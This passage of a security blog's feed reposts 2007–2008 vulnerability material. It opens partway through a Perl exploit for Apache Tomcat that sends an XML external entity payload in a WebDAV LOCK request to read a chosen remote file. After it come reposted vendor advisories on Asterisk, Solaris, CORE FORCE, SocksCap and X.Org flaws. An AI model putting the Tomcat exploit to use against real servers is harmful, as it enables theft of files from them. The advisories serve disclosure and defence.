version=\"1.0\"?&gt;\n"&lt;br /&gt;."&lt;!DOCTYPE REMOTE [\n"&lt;br /&gt;."&lt;!ENTITY RemoteX SYSTEM \"$remotefile\"&gt;\n"&lt;br /&gt;."]&gt;\n"&lt;br /&gt;."&lt;D:lockinfo xmlns:D='DAV:'&gt;\n"&lt;br /&gt;."&lt;D:lockscope&gt;&lt;D:exclusive/&gt;&lt;/D:lockscope&gt;\n"&lt;br /&gt;."&lt;D:locktype&gt;&lt;D:write/&gt;&lt;/D:locktype&gt;\n"&lt;br /&gt;."&lt;D:owner&gt;\n"&lt;br /&gt;."&lt;D:href&gt;\n"&lt;br /&gt;."&lt;REMOTE&gt;\n"&lt;br /&gt;."&lt;RemoteX&gt;&amp;RemoteX;&lt;/RemoteX&gt;\n"&lt;br /&gt;."&lt;/REMOTE&gt;\n"&lt;br /&gt;."&lt;/D:href&gt;\n"&lt;br /&gt;."&lt;/D:owner&gt;\n"&lt;br /&gt;."&lt;/D:lockinfo&gt;\n";&lt;br /&gt;&lt;br /&gt;print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";&lt;br /&gt;print "kcdarookie aka eliteb0y / 2007\n";&lt;br /&gt;print "Launching Remote Exploit...\n";&lt;br /&gt;&lt;br /&gt;$ExploitRequest =&lt;br /&gt; "LOCK $webdavfile HTTP/1.1\r\n"&lt;br /&gt;."Host: $hostname\r\n";&lt;br /&gt;&lt;br /&gt;if ($username ne "") {&lt;br /&gt;$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; &lt;br /&gt;}&lt;br /&gt;$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;&lt;br /&gt;&lt;br /&gt;print $sock $ExploitRequest;&lt;br /&gt;&lt;br /&gt;while(&lt;$sock&gt;) {&lt;br /&gt; print;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2007-10-14]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4755801140345275851?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4755801140345275851/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4755801140345275851' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4755801140345275851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4755801140345275851'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/apache-tomcat-remote-file-disclosure.html' title='Apache Tomcat Remote File Disclosure Zeroday Xploit'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7068021597971637251</id><published>2008-02-08T06:49:00.000-08:00</published><updated>2008-02-08T06:51:17.543-08:00</updated><title type='text'>IMAP Storage Buffer Overflows in Asterisk's Voicemail</title><content type='html'>tomado de : http://downloads.digium.com/pub/security/AST-2007-022.html&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisory - AST-2007-022&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Asterisk&lt;br /&gt;&lt;br /&gt;Summary&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Buffer overflows in voicemail when using IMAP storage&lt;br /&gt;&lt;br /&gt;Nature of Advisory&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Remotely and locally exploitable buffer overflows&lt;br /&gt;&lt;br /&gt;Susceptibility&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Remote Unauthenticated Sessions&lt;br /&gt;&lt;br /&gt;Severity&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Minor&lt;br /&gt;&lt;br /&gt;Exploits Known&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;No&lt;br /&gt;&lt;br /&gt;Reported On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 9, 2007&lt;br /&gt;&lt;br /&gt;Reported By&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Russell Bryant &lt;russell@digium.com&gt;&lt;br /&gt;&lt;br /&gt;Mark Michelson &lt;mmichelson@digium.com&gt;&lt;br /&gt;&lt;br /&gt;Posted On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 9, 2007&lt;br /&gt;&lt;br /&gt;Last Updated On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 15, 2007&lt;br /&gt;&lt;br /&gt;Advisory Contact&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Mark Michelson &lt;mmichelson@digium.com&gt;&lt;br /&gt;&lt;br /&gt;CVE Name&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;CVE-2007-5358&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Description&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The function â€œsprintfâ€ was used heavily throughout the IMAP-specific voicemail code. After auditing the code, two vulnerabilities were discovered, both buffer overflows.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The following buffer overflow required write access to Asterisk's configuration files in order to be exploited.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1) If a combination of the astspooldir (set in asterisk.conf), the voicemail context, and voicemail mailbox, were very long, then there was a buffer overflow when playing a message or forwarding a message (in the case of forwarding, the context and mailbox in question are the context and mailbox that the message was being forwarded to).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The following buffer overflow could be exploited remotely.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2) If any one of, or any combination of the Content-type or Content-description headers for an e-mail that Asterisk recognized as a voicemail message contained more than a 1024 characters, then a buffer would overflow while listening to a voicemail message via a telephone. It is important to note that this did NOT affect users who get their voicemail via an e-mail client.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Resolution&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;â€œsprintfâ€ calls have been changed to â€œsnprintfâ€ wherever space was not specifically allocated to the buffer prior to the sprintf call. This includes places which are not currently prone to buffer overflows.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Affected Versions&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Release Series&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.0.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.2.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.4.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;All versions prior to 1.4.13&lt;br /&gt;&lt;br /&gt;Asterisk Business Edition&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;A.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Business Edition&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;B.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;AsteriskNOW&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;pre-release&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Appliance Developer Kit&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;0.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;s800i (Asterisk Appliance)&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.0.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Corrected In&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Release&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.4.13&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Links&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisories are posted at http://www.asterisk.org/security.&lt;br /&gt;&lt;br /&gt;This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2007-022.pdf and http://downloads.digium.com/pub/security/AST-2007-022.html.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Revision History&lt;br /&gt;&lt;br /&gt;Date&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Editor&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Revisions Made&lt;br /&gt;&lt;br /&gt;October 9, 2007&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;mmichelson@digium.com&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Initial Release&lt;br /&gt;&lt;br /&gt;October 15, 2007&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;mmichelson@digium.com&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Added CVE name&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisory - AST-2007-022&lt;br /&gt;Copyright © 2007 Digium, Inc. All Rights Reserved.&lt;br /&gt;Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7068021597971637251?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7068021597971637251/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7068021597971637251' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7068021597971637251'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7068021597971637251'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/imap-storage-buffer-overflows-in.html' title='IMAP Storage Buffer Overflows in Asterisk&apos;s Voicemail'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8786159746397976303</id><published>2008-02-08T06:48:00.000-08:00</published><updated>2008-02-08T06:49:52.721-08:00</updated><title type='text'>Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability</title><content type='html'>Tomado de: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=603&lt;br /&gt;PUBLIC ADVISORY: 10.02.07&lt;br /&gt; Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 10.02.07&lt;br /&gt;Email This Page URL  Print This Page&lt;br /&gt;Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability&lt;br /&gt;I. BACKGROUND&lt;br /&gt;&lt;br /&gt;Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at the following URL.&lt;br /&gt;&lt;br /&gt;http://www.sun.com/software/solaris/&lt;br /&gt;II. DESCRIPTION&lt;br /&gt;&lt;br /&gt;Local exploitation of an integer signedness error in Sun Microsystem's Solaris could allow attackers to disclose sensitive information from memory.&lt;br /&gt;&lt;br /&gt;The FIFO FS (First In First Out File System) is a service provided by the kernel that is commonly used for IPC (InterProcess Communication). A FIFO is represented as a node in the file system, and is similar to the concept of named pipes in Windows.&lt;br /&gt;&lt;br /&gt;The vulnerability exists in the kernel ioctl() handler for FIFOs. The I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO without actually removing them from the queue. One of the arguments to this command, which represents the number of bytes to peek, is a signed integer value. Since this parameter is not properly validated, a negative value can cause large amounts of kernel memory contents to be disclosed.&lt;br /&gt;III. ANALYSIS&lt;br /&gt;&lt;br /&gt;Exploitation allows an attacker to view potentially sensitive information belonging to the kernel or other users. For example, the root password hash or encryption keys might be disclosed.&lt;br /&gt;IV. DETECTION&lt;br /&gt;&lt;br /&gt;iDefense has confirmed the existence of this vulnerability in Solaris 10 on x86 and SPARC. It is suspected that earlier versions are also affected.&lt;br /&gt;V. WORKAROUND&lt;br /&gt;&lt;br /&gt;iDefense is not aware of any workaround for this issue.&lt;br /&gt;VI. VENDOR RESPONSE&lt;br /&gt;&lt;br /&gt;Sun has addressed this vulnerability by releasing patches. For more information, consult Sun Alert 103061 at the following URL.&lt;br /&gt;&lt;br /&gt;http://sunsolve.sun.com/search/document.do?assetkey=1-26-103061-1&lt;br /&gt;VII. CVE INFORMATION&lt;br /&gt;&lt;br /&gt;A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.&lt;br /&gt;VIII. DISCLOSURE TIMELINE&lt;br /&gt;&lt;br /&gt;02/13/2007 Initial vendor notification&lt;br /&gt;02/15/2007 Initial vendor response&lt;br /&gt;10/02/2007 Coordinated public disclosure&lt;br /&gt;IX. CREDIT&lt;br /&gt;&lt;br /&gt;The discoverer of this vulnerability wishes to remain anonymous.&lt;br /&gt;&lt;br /&gt;Get paid for vulnerability research&lt;br /&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;br /&gt;&lt;br /&gt;Free tools, research and upcoming events&lt;br /&gt;http://labs.idefense.com/&lt;br /&gt;X. LEGAL NOTICES&lt;br /&gt;&lt;br /&gt;Copyright � 2007 iDefense, Inc.&lt;br /&gt;&lt;br /&gt;Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.&lt;br /&gt;&lt;br /&gt;Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8786159746397976303?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8786159746397976303/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8786159746397976303' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8786159746397976303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8786159746397976303'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/sun-microsystems-solaris-fifo-fs.html' title='Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-2995412751114769027</id><published>2008-02-08T06:34:00.000-08:00</published><updated>2008-02-08T06:35:27.783-08:00</updated><title type='text'>CORE FORCE Kernel Buffer Overflow</title><content type='html'>tomado de:http://www.coresecurity.com/?action=item&amp;id=2025&lt;br /&gt;&lt;br /&gt;CORE FORCE Kernel Buffer Overflow&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Core Security Technologies - CoreLabs Advisory&lt;br /&gt;http://www.coresecurity.com/corelabs/&lt;br /&gt;Advisory Information&lt;br /&gt;&lt;br /&gt;Title: CORE FORCE Kernel Buffer Overflow&lt;br /&gt;Advisory ID:  CORE-2007-1119&lt;br /&gt;Advisory URL: http://www.coresecurity.com/?action=item&amp;id=2025&lt;br /&gt;Date published: 2008-01-17&lt;br /&gt;Date of last update: 2008-01-17&lt;br /&gt;Release mode: Coordinated release&lt;br /&gt;Vulnerability Information&lt;br /&gt;&lt;br /&gt;Class: Input validation error (Buffer Overflow)&lt;br /&gt;Remotely Exploitable: No&lt;br /&gt;Locally Exploitable: Yes&lt;br /&gt;Bugtraq ID: 27341&lt;br /&gt;CVE Name: CVE-2008-0366&lt;br /&gt;Vulnerability Description&lt;br /&gt;&lt;br /&gt;CORE FORCE is the first community oriented security solution for personal computers that  provides a comprehensive endpoint security solution for Windows 2000 and Windows XP systems.&lt;br /&gt;&lt;br /&gt;CORE FORCE provides inbound and outbound stateful packet filtering for TCP/IP protocols using a Windows port of OpenBSD's PF firewall, granular file system and registry access control and programs' integrity validation. These capabilities can be configured and enforced system-wide or on a per-application basis for specific programs such as email readers, Web browsers, media players, messaging software, etc. The security framework provided by CORE FORCE is leveraged by a community of security experts that share their security configurations for a growing list of programs. These security profiles can be downloaded by any user of CORE FORCE from the community Web site and they're also completely open so that they can be peer-reviewed to minimize security hazards.&lt;br /&gt;&lt;br /&gt;Locally exploitable kernel buffer overflow vulnerabilities and unproperly validated input arguments have been found in CORE FORCE Firewall and Registry modules. The vulnerabilities allow unprivileged logged on users to crash the system (denial of service), and they also may lead to a privilege escalation or even a local root exploit.&lt;br /&gt;Vulnerable packages&lt;br /&gt;&lt;br /&gt;CORE FORCE 0.95.167 and below.&lt;br /&gt;Non-vulnerable packages&lt;br /&gt;&lt;br /&gt;CORE FORCE 0.95.172.&lt;br /&gt;Vendor Information, Solutions and Workarounds&lt;br /&gt;&lt;br /&gt;This vulnerability was fixed in CORE FORCE version 0.95.172 which is available at:&lt;br /&gt;http://force.coresecurity.com/&lt;br /&gt;Credits&lt;br /&gt;&lt;br /&gt;This vulnerability was discovered by Sebastian Gottschalk.&lt;br /&gt;Technical Description / Proof of Concept Code&lt;br /&gt;&lt;br /&gt;The firewall functionality of CORE FORCE is as a port of OpenBSD’s PF firewall implemented as an NDIS complaint kernel driver that mediates communications between the Network card and the TCP/IP stack of the operating system. Thus stateful, bi-directional firewalling rules can be enforced independently of the Windows OS firewall capabilities and at a deeper layer, closer to the wire. The kernel driver is accessible to a user mode application via IOCTL functions.&lt;br /&gt;&lt;br /&gt;There are 4 IOCTL functions on the firewall driver module that use input received from userspace and do not validate the length of the input buffers properly. By calling any of these IOCTLs from with properly crafted arguments, an unprivileged user could trigger vulnerabilities in the driver and cause a denial of service or potentially to execute arbitrary code with elevated privileges.&lt;br /&gt;&lt;br /&gt;Similarly other 7 SSDT hook handler functions on the driver that intercepts the Registry access on Windows are vulnerable to input validation errors.&lt;br /&gt;&lt;br /&gt;All the vulnerabilities can be reproduced by running a combination of  DC2 and BSODHook tools.&lt;br /&gt;&lt;br /&gt;    * Step by step instructions:&lt;br /&gt;    * Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.&lt;br /&gt;    * Login as unprivileged user.&lt;br /&gt;    * Run "dc2 /hct /a"&lt;br /&gt;    * Get BSODHook.exe from Matousec [3]&lt;br /&gt;    * Click on "Load Driver" then click on "Find SSDT hooks" then "Add to probe list" and then "GO"&lt;br /&gt;&lt;br /&gt;Report Timeline&lt;br /&gt;&lt;br /&gt;    * 2007-11-04: Initial notification by independent researcher Sebastian Gottschalk.&lt;br /&gt;    * 2007-11-05: Email acknowledging reception of the bug reports and indicating that looking into the report would probably take Core more than a week. Core requested details to reproduce a second type of bug related to hooking of the SSDT.&lt;br /&gt;    * 2007-11-05: Email from Sebastian Gottschalk indicating that the BSODhook from Matousec [3] could be used to reproduce the SSDT hooking problems.&lt;br /&gt;    * 2007-11-19: A fix is produced by the Core Force team. Core asks the researcher whether he wants to be credited for the discovery in the advisory.&lt;br /&gt;    * 2007-11-22: Sebastian Gottschalk accepts to be credited.&lt;br /&gt;    * 2007-11-28: Email sent to Sebastian Gottschalk indicating the Core found a bug in the fix and will have to delay publication of a fixed version of Core Force.&lt;br /&gt;    * 2007-11-29: New fix committed by the Core Force team.&lt;br /&gt;    * 2007-12-17: Other functions were also found vulnerable in the Registry module.&lt;br /&gt;    * 2008-01-07: New fix committed by the Core Force team.&lt;br /&gt;    * 2008-01-17: CORE-2007-1119 advisory is published.&lt;br /&gt;&lt;br /&gt;References&lt;br /&gt;&lt;br /&gt;[1] CORE FORCE: http://force.coresecurity.com/&lt;br /&gt;[2] Driver testing: http://blogs.msdn.com/ravig/default.aspx&lt;br /&gt;[3] http://www.matousec.com&lt;br /&gt;About Corelabs&lt;br /&gt;&lt;br /&gt;CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies.&lt;br /&gt;We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies.&lt;br /&gt;CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at http://www.coresecurity.com/corelabs/&lt;br /&gt;About Core Security Technologies&lt;br /&gt;&lt;br /&gt;Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.&lt;br /&gt;DISCLAIMER&lt;br /&gt;&lt;br /&gt;The contents of this advisory are copyright (c) 2008 CORE Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.&lt;br /&gt;PGP/GPG KEYS&lt;br /&gt;&lt;br /&gt;This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-2995412751114769027?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/2995412751114769027/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=2995412751114769027' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2995412751114769027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2995412751114769027'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/core-force-kernel-buffer-overflow.html' title='CORE FORCE Kernel Buffer Overflow'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5441455667360171618</id><published>2008-02-08T06:33:00.000-08:00</published><updated>2008-02-08T06:34:42.542-08:00</updated><title type='text'>SocksCap Hostname Resolution Stack Overflow</title><content type='html'>Tomado de :http://www.securiteam.com/windowsntfocus/5UP0P00N5C.html&lt;br /&gt;&lt;br /&gt;SocksCap Hostname Resolution Stack Overflow   20 Jan. 2008&lt;br /&gt; &lt;br /&gt; Summary&lt;br /&gt;SocksCap is "an application wrapper developed by NEC. SocksCap allows Windows 95/98/NT users to enable their Winsock applications to traverse a SOCKS server. SocksCap does not require modifications to the Winsock applications or the Winsock stacks. On a SOCKS enabled firewall SocksCap offers a client-only solution". A vulnerability within SocksCap allows attacker to cause the program to overflow an internal buffer used by the hostname resolution mechanism.&lt;br /&gt; &lt;br /&gt;Credit:&lt;br /&gt;The information has been provided by Azizov.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vulnerable Systems:&lt;br /&gt; * SocksCap version 2.40-051231 and prior&lt;br /&gt;&lt;br /&gt;Due to the fact that no length check is done during the hostname resolution process whenever the SockCap tries to resolve a remote resource, it is possible to cause the product to overflow a buffer used by the product. The overflow is triggered whenever the hostsname's name is more then 692 bytes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5441455667360171618?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5441455667360171618/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5441455667360171618' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5441455667360171618'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5441455667360171618'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/sockscap-hostname-resolution-stack.html' title='SocksCap Hostname Resolution Stack Overflow'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5582484132890417882</id><published>2008-02-08T06:29:00.000-08:00</published><updated>2008-02-08T06:32:47.612-08:00</updated><title type='text'>Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability</title><content type='html'>tomado de: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=646&lt;br /&gt;PUBLIC ADVISORY: 01.17.08&lt;br /&gt; Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 01.17.08&lt;br /&gt;Email This Page URL  Print This Page&lt;br /&gt;Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability&lt;br /&gt;I. BACKGROUND&lt;br /&gt;&lt;br /&gt;The X Window System (or X11) is a graphical windowing system used on Unix-like systems. It is based on a client/server model. More information about about The X Window system is available at the following URL.&lt;br /&gt;&lt;br /&gt;http://en.wikipedia.org/wiki/X_Window_System&lt;br /&gt;II. DESCRIPTION&lt;br /&gt;&lt;br /&gt;Local exploitation of an invalid array index vulnerability in the X.Org X server, as included in various vendors' operating system distributions, could allow an attacker to execute arbitrary code with the privileges of the X server, typically root.&lt;br /&gt;&lt;br /&gt;The vulnerability exists within the XFree86-Misc extension. When processing a request, a 32-bit value from the client's request is used as an index into an array of structures. This structure contains an array of function pointers, one of which is used later in the request handling. By supplying a large array index, an arbitrary function pointer can be dereferenced. This results in the execution of arbitrary code.&lt;br /&gt;III. ANALYSIS&lt;br /&gt;&lt;br /&gt;Exploitation allows an attacker to execute arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must be able to send commands to an affected X server. This typically requires access to the console or access to the same account as a user who is on the console.&lt;br /&gt;&lt;br /&gt;If an X Server is configured to listen for TCP based client connections, and a client is granted access to create sessions (via the xhosts file), then the vulnerability can be exploited remotely.&lt;br /&gt;IV. DETECTION&lt;br /&gt;&lt;br /&gt;iDefense has confirmed the existence of this vulnerability in X.org X11 version R7.3. Previous versions may also be affected.&lt;br /&gt;V. WORKAROUND&lt;br /&gt;&lt;br /&gt;If the XFree86-Misc extension has not been built-in to the server, then it can be prevented from loading by inserting the following into the X configuration file (usually in /etc/X11/xorg.conf).&lt;br /&gt;&lt;br /&gt;  Section "Module"&lt;br /&gt;    SubSection "extmod"&lt;br /&gt;      Option "omit XFree86-Misc"&lt;br /&gt;    EndSubSection&lt;br /&gt;  EndSection&lt;br /&gt;&lt;br /&gt;To check if the extension is built-in to the server, grep the output of the X Server log file.&lt;br /&gt;&lt;br /&gt;  grep built-in /var/log/Xorg.0.log&lt;br /&gt;&lt;br /&gt;The result will list all built in extensions. The location of the log file may need to be changed.&lt;br /&gt;VI. VENDOR RESPONSE&lt;br /&gt;&lt;br /&gt;The X.Org team has addressed this vulnerability with the release of Xserver version 1.4.1. Additionally, patches for versions 1.4 and 1.2 have been made available. For more information, consult the X.Org advisory at the following URL.&lt;br /&gt;&lt;br /&gt;http://lists.freedesktop.org/archives/xorg/2008-January/031918.html&lt;br /&gt;VII. CVE INFORMATION&lt;br /&gt;&lt;br /&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5760 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.&lt;br /&gt;VIII. DISCLOSURE TIMELINE&lt;br /&gt;&lt;br /&gt;11/29/2007 Initial vendor response&lt;br /&gt;11/30/2007 Initial vendor notification&lt;br /&gt;01/17/2008 Coordinated public disclosure&lt;br /&gt;IX. CREDIT&lt;br /&gt;&lt;br 